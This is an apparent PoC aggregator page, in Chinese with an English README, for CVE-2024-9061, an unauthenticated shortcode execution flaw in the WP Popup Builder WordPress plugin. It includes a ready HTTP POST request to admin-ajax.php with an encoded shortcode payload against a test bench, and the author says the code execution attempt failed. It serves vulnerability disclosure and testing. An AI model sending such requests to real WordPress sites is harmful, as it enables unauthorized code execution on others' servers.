POC详情: 042209fa54b391fa27db0b50aa8e4600db40dc77

来源
关联漏洞
标题: WordPress plugin The WP Popup Builder 代码注入漏洞 (CVE-2024-9061)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin The WP Popup Builder 1.3.5版本及之前版本存在代码注入漏洞,该漏洞源于通过 wp_ajax_nopriv_shortcode_Api_Add 函数可以执行任意代码。
描述
WP Popup Builder – Popup Forms and Marketing Lead Generation <= 1.3.5 - Unauthenticated Arbitrary Shortcode Execution via wp_ajax_nopriv_shortcode_Api_Add
介绍
# CVE-2024-9061
WP Popup Builder – Popup Forms and Marketing Lead Generation &lt;= 1.3.5 - Unauthenticated Arbitrary Shortcode Execution via wp_ajax_nopriv_shortcode_Api_Add

# Description

The The WP Popup Builder – Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. NOTE: This vulnerability was partially fixed in version 1.3.5 with a nonce check, which effectively prevented access to the affected function. However, version 1.3.6 incorporates the correct authorization check to prevent unauthorized access.

I had another plugin installed for php execution for this but never got it to execute.

[xyz-ips snippet="test"]

# Info

```
Type: plugin
CVSS Score: 7.3
CVE: CVE-2024-9061
Slug: wp-popup-builder
Download Link: Download [wp-popup-builder Version 1.3.2](https://downloads.wordpress.org/plugin/wp-popup-builder.1.3.2.zip)
```

POC
---

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wpscan-vulnerability-test-bench.ddev.site
User-Agent: curl/8.7.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Connection: keep-alive

action=shortcode_Api_Add&shortcode=%5b%78%79%7a%2d%69%70%73%20%73%6e%69%70%70%65%74%3d%22%74%65%73%74%22%5d
```

Response is a blank 200
文件快照

[4.0K] /data/pocs/042209fa54b391fa27db0b50aa8e4600db40dc77 └── [1.5K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。